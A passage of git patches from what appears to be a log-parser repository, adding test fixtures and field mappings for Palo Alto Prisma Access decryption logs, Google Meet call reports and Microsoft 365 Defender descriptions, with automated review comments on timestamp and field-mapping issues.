@@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": 
"5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From 652c3ba67b29328a991970be1b7ea34412123e40 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 10:33:29 +0100 Subject: [PATCH 277/317] Google Report: add source.ip and user.email --- Google Cloud/google-report/ingest/parser.yml | 2 + .../google-report/tests/test_end_call.json | 59 +++++++++++++++++++ .../tests/test_end_call_no_ip.json | 44 ++++++++++++++ .../tests/test_meet_sample1.json | 9 ++- 4 files changed, 113 insertions(+), 1 deletion(-) create mode 100644 Google Cloud/google-report/tests/test_end_call.json create mode 100644 Google Cloud/google-report/tests/test_end_call_no_ip.json diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 4213a66c9..a52024ed9 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml 
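Review bot: `@timestamp` is expected as `2024-11-03T19:09:43Z`, but the row's own high-resolution timestamp is `2024-11-03T19:09:43.654+01:00`, i.e. `18:09:43.654Z`, so the fixture pins an event time one hour late; the HIPMATCH CSV fixture in the previous commit converts the same kind of value correctly (`17:50:04.310000Z` from `18:50:04.310+01:00`). Presumably the decryption DSV branch feeds `GenerateTime` rather than `HighResTimestamp` to `date.parse` (that stage is outside this chunk); `HighResTimestamp` carries the UTC offset and should be preferred, with the expectation becoming `"@timestamp": "2024-11-03T18:09:43.654000Z"`. `action.type` is also pinned to `"0"` here whereas the JSON fixture for the same log type expects `"start"`, because the column the DSV list calls `Subtype` appears to be the numeric Threat/Content Type field in this layout (the same `"0"` lands in `paloalto.Threat_ContentType`); a `0` carries no subtype and is better left unset than stored as a type.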
@@ -161,6 +161,8 @@ stages:
 network.transport: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "network_transport_protocol" %}{{param.value}}{% endif %}{% endfor %}'
 google.report.meet.code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "meeting_code" %}{{param.value}}{% endif %}{% endfor %}'
+ user.email: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "organizer_email" %}{{param.value}}{% endif %}{% endfor %}'
+ source.ip: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ip_address" %}{{param.value}}{% endif %}{% endfor %}'
 set_groups_enterprise_fields:
 actions:
diff --git a/Google Cloud/google-report/tests/test_end_call.json b/Google Cloud/google-report/tests/test_end_call.json
new file mode 100644
index 000000000..21a51a926
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_end_call.json
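Review bot: `user.email` is filled from the `organizer_email` parameter, but for a `call_ended` record the actor is the participant (the new fixture below has `actor.callerType: "KEY"` with `key: "HANGOUTS_EXTERNAL_OR_ANONYMOUS"`), so ECS `user.email` would identify the meeting organizer rather than whoever the event is about, and a rule treating `user.email` as the actor would attribute an external participant's activity to the organizer. A vendor field such as `google.report.meet.organizer_email` (constructed name, alongside the existing `google.report.meet.code`) preserves the distinction; if `user.email` is intentional, a comment such as `# organizer_email is the meeting owner, not the event actor` should say so. `source.ip` from `ip_address` looks right for the participant's address, though the loop template copies whatever the parameter holds without validation, so a non-IP value would be written to an `ip`-typed field (how the backend handles that is not visible here).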
@@ -0,0 +1,59 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Pari
s\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",
\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T12:07:37.366000Z", + "client": { + "geo": { + "country_iso_code": "FR", + "region_name": "Paris" + } + }, + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "ABCDEFGHIJ" + } + } + }, + "network": { + "application": "meet", + "transport": "udp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file 
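Review bot: The fixture is committed without a final newline (`\ No newline at end of file`), as are test_end_call_no_ip.json and test_cloud_app4.json in this series; terminating each file with a newline keeps future diffs to the last line clean and matches the other fixtures in the repository. No change to the expected values is needed.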
diff --git a/Google Cloud/google-report/tests/test_end_call_no_ip.json b/Google Cloud/google-report/tests/test_end_call_no_ip.json
new file mode 100644
index 000000000..de33d47c4
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_end_call_no_ip.json
@@ -0,0 +1,44 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\"
:\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value
\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T11:32:12.301000Z", + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "BUSOHGFTVB" + } + } + }, + "network": { + "application": "meet", + "transport": "tcp" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_meet_sample1.json b/Google Cloud/google-report/tests/test_meet_sample1.json index 406a0943c..fd7b1fa66 100644 --- a/Google Cloud/google-report/tests/test_meet_sample1.json +++ b/Google Cloud/google-report/tests/test_meet_sample1.json 
@@ -41,13 +41,20 @@
 "transport": "udp"
 },
 "related": {
+ "ip": [
+ "5555:333:333:5555:5555:5555:5555:5555"
+ ],
 "user": [
 "jone.doe"
 ]
 },
+ "source": {
+ "address": "5555:333:333:5555:5555:5555:5555:5555",
+ "ip": "5555:333:333:5555:5555:5555:5555:5555"
+ },
 "user": {
 "domain": "test.com",
- "email": "jone.doe@test.com",
+ "email": "joe.done@test.com",
 "id": "1098488062555",
 "name": "jone.doe"
 }
From 74e459dd00f628dc287820ee60efef6fb61789ab Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Fri, 22 Nov 2024 10:39:44 +0100
Subject: [PATCH 278/317] Prettier on another parser to pass tests
---
 GateWatcher/aioniq/ingest/parser.yml | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 3cc13d747..20c57feb0 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -206,12 +206,12 @@ stages:
 tls:
 actions:
 - set:
- tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
- tls.server.not_before: "{{json_load.message.tls.notbefore}}"
- tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
- tls.server.subject: "{{json_load.message.tls.subject}}"
- gatewatcher.tls: "{{json_load.message.tls}}"
- gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
- gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
- tls.version: "{{json_load.message.tls.version}}"
- tls.server.not_after: "{{json_load.message.tls.notafter}}"
+ tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
+ tls.server.not_before: "{{json_load.message.tls.notbefore}}"
+ tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
+ tls.server.subject: "{{json_load.message.tls.subject}}"
+ gatewatcher.tls: "{{json_load.message.tls}}"
+ gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
+ gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
+ tls.version: "{{json_load.message.tls.version}}"
+ tls.server.not_after: "{{json_load.message.tls.notafter}}"
From ba631f3d23a2724a148dea4093f6010b3d176331 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Fri, 22 Nov 2024 10:41:05 +0100
Subject: [PATCH 279/317] fix on linting
---
 GateWatcher/aioniq/_meta/fields.yml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index 07bae26e7..8bc01d294 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -389,16 +389,16 @@ gatewatcher.tls:
 name: gatewatcher.tls
 type: text
-gatewatcher.tls_sni:
- description: This field represents the TLS SNI field in a TLS metadata
- name: gatewatcher.tls_sni
- type: text
-
 gatewatcher.tls_fingerprint:
 description: This field represents the TLS server fingerprint field in a TLS metadata
 name: gatewatcher.tls_fingerprint
 type: text
+gatewatcher.tls_sni:
+ description: This field represents the TLS SNI field in a TLS metadata
+ name: gatewatcher.tls_sni
+ type: text
+
 gatewatcher.ttp:
 description: This field is used for retrohunt alerts
 name: gatewatcher.ttp
From 97df6b20679a01fb368a3a46dc440ef564086d46 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Fri, 22 Nov 2024 12:07:17 +0100
Subject: [PATCH 280/317] Microsoft 365 defender : fix on smart descriptions
---
 .../_meta/smart-descriptions.json | 61 ++++++++++++
 .../tests/test_cloud_app4.json | 63 ++++++++++++
 .../tests/test_device_logon_failed.json | 98 +++++++++++++++++++
 .../tests/test_email_delivered.json | 76 ++++++++++++++
 .../tests/test_email_delivered2.json | 76 ++++++++++++++
 5 files changed, 374 insertions(+)
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_cloud_app4.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_delivered.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_delivered2.json
diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
index 21e3caf3c..6232e66f8 100644
--- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
+++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
@@ -1,4 +1,14 @@
 [
+ {
+ "value": "A new {action.type} cloud app event have been received",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "cloud_app_events"
+ },
+ { "field": "action.type" }
+ ]
+ },
 {
 "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}",
 "conditions": [
@@ -132,6 +142,35 @@
 }
 ]
 },
+ {
+ "value": "{user.domain}\\{user.name} failed to log on {host.name}",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "device_logon_events"
+ },
+ {
+ "field": "host.name"
+ },
+ {
+ "field": "user.name"
+ },
+ {
+ "field": "user.domain"
+ },
+ {
+ "field": "action.type",
+ "value": "LogonFailed"
+ }
+ ],
+ "relationships": [
+ {
+ "source": "user.name",
+ "target": "host.name",
+ "type": "logged on"
+ }
+ ]
+ },
 {
 "value": "{user.domain}\\{user.name} logged on {host.name}",
 "conditions": [
@@ -402,6 +441,28 @@
 { "field": "email.to.address" }
 ]
 },
+ {
+ "value": "{event.action} email from {email.from.address} to {email.to.address}",
+ "conditions": [
+ { "field": "event.dataset", "value": "email_events" },
+ { "field": "email.from.address" },
+ { "field": "email.to.address" }
+ ]
+ },
+ {
+ "value": "{event.action} email from {email.from.address}",
+ "conditions": [
+ { "field": "event.dataset", "value": "email_events" },
+ { "field": "email.from.address" }
+ ]
+ },
+ {
+ "value": "{event.action} email to {email.to.address}",
+ "conditions": [
+ { "field": "event.dataset", "value": "email_events" },
+ { "field": "email.to.address" }
+ ]
+ },
 {
 "value": "{action.type} on {url.original}",
 "conditions": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json
new file mode 100644
index 000000000..86f044fe7
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json
